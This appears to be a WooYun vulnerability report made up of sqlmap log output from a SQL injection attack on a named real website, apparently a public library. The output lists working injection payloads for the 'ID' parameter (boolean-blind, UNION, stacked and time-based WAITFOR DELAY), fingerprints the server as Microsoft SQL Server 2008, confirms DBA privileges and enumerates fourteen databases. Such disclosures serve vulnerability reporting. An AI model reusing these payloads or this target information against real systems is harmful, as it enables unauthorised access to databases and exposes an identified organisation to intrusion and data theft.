WooYun.org

GET parameter 'ID' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N]
sqlmap identified the following injection points with a tota
l of 59 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=289' AND 7155=7155 AND 'BuFQ'='BuFQ
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ID=-6977' UNION ALL SELECT NULL,NULL,CHAR(113)+
CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(87)+C
HAR(87)+CHAR(103)+CHAR(109)+CHAR(110)+CHAR(109)+CHAR(70)+CHA
R(81)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR
(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=289'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=289' WAITFOR DELAY '0:0:5'--
---
[21:43:05] [INFO] testing Microsoft SQL Server
[21:43:06] [INFO] confirming Microsoft SQL Server
[21:43:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[21:43:07] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 37 times
[21:43:07] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.fslib.com.cn'
[*] shutting down at 21:43:07

sqlmap identified the following injection points with a tota
l of 0 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=289' AND 7155=7155 AND 'BuFQ'='BuFQ
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ID=-6977' UNION ALL SELECT NULL,NULL,CHAR(113)+
CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(87)+C
HAR(87)+CHAR(103)+CHAR(109)+CHAR(110)+CHAR(109)+CHAR(70)+CHA
R(81)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(120)+CHAR
(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=289'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=289' WAITFOR DELAY '0:0:5'--
---
[21:44:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[21:44:04] [INFO] testing if current user is DBA
current user is DBA:    True
[21:44:04] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.fslib.com.cn'
[*] shutting down at 21:44:04

available databases [14]:
[*] beehome
[*] DBWIN_L4P_UCDRS
[*] fselib
[*] FSUnionlib
[*] master
[*] model
[*] msdb
[*] newlib
[*] oldfslib
[*] ReportServer
[*] ReportServerTempDB
[*] ResourcesClient
[*] tempdb
[*] wenhua